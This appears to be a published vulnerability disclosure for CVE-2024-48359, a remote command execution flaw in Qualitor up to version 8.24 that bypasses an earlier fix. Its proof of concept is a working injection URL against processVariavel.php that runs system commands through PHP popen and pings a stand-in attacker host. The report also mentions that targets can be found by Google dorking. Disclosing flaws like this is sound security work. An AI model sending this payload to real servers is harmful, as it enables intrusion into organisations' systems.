- Published on
CVE-2024-48359
Report
Date: 30/10/2024
Author: OpenXP Team
Software: Qualitor
Version: Qualitor <= 8.24
Type: Remote Command Execution
OWASP TOP 10: A03:2021-Injection
References: https://www.cloudflare.com/pt-br/learning/security/what-is-remote-code-execution/
Description
Qualitor is a platform for business process management, and this system is present in various companies in Brazil that can be identified simply by using Google dorking.
Our team identified a vulnerability in the application susceptible to Remote Code Execution (RCE), which allows remote execution of system commands.
This is an bypass for the CVE-2023-47253 fix.
Proof of Concept (POC)
Just send a PHP code in the page processVariavel.php, ex: /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));